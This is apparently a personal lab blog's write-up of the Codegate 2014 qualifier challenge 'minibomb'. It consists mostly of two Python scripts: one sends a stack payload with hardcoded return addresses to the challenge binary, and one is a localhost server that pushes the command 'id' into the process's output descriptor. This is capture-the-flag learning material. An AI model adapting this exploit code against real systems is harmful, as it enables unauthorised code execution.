cdor1's lab
Codegate 2014 Quals minibomb
Afterword: I am not at all familiar with exploitation done at the low level, and this was the first time I had run into it since pwnable.kr otp,
so I referred to the More Smoked Leet Chicken team's write-up.
-bombclient.py & bombserver.py-
############ bombclient.py ############
import socket
import struct
import sys
from subprocess import Popen, PIPE
from time import sleep


def p32(value):
    # Little-endian 32-bit pack; the same thing pwntools' p32() does.
    return struct.pack("<I", value)


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 1234))
s.setblocking(False)
sleep(5)

# First message to bombserver.py: a run of 'A's whose length comes from argv[1].
f_len = int(sys.argv[1])
s.sendall(b"A" * f_len)

# Run the target under strace with its stdout (fd 1) bound to the socket,
# so whatever the process reads from or writes to fd 1 goes over the connection.
p = Popen("strace -if ./minibomb", shell=True, stdin=PIPE, stdout=s)

# Payload delivered on the target's stdin; the addresses are the ones from the write-up.
pay = b"A" * 16
pay += p32(0x55557c91)
pay += p32(0x11)
pay += p32(0x08049150)
pay += p32(0x08048143)
pay += b"A" * 16
pay += p32(0x55557c91)
pay += p32(0)
pay += p32(0)
pay += p32(0x080480b4)
p.stdin.write(pay)
p.stdin.flush()  # the pipe is buffered on Python 3; make sure the payload actually leaves
sleep(1000)
############ bombserver.py ############
import socket
from time import sleep

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts on port 1234
srv.bind(("localhost", 1234))
srv.listen(100)
while True:
    # Keep the listening socket and the accepted connection apart: the original
    # rebound `s` to the connection, so the second accept() would have failed.
    conn, addr = srv.accept()
    # Push 'id' padded with NULs to 11 bytes into the connection, i.e. into the target's fd 1.
    conn.sendall(b"id".ljust(11, b"\x00"))
    sleep(10)
    conn.close()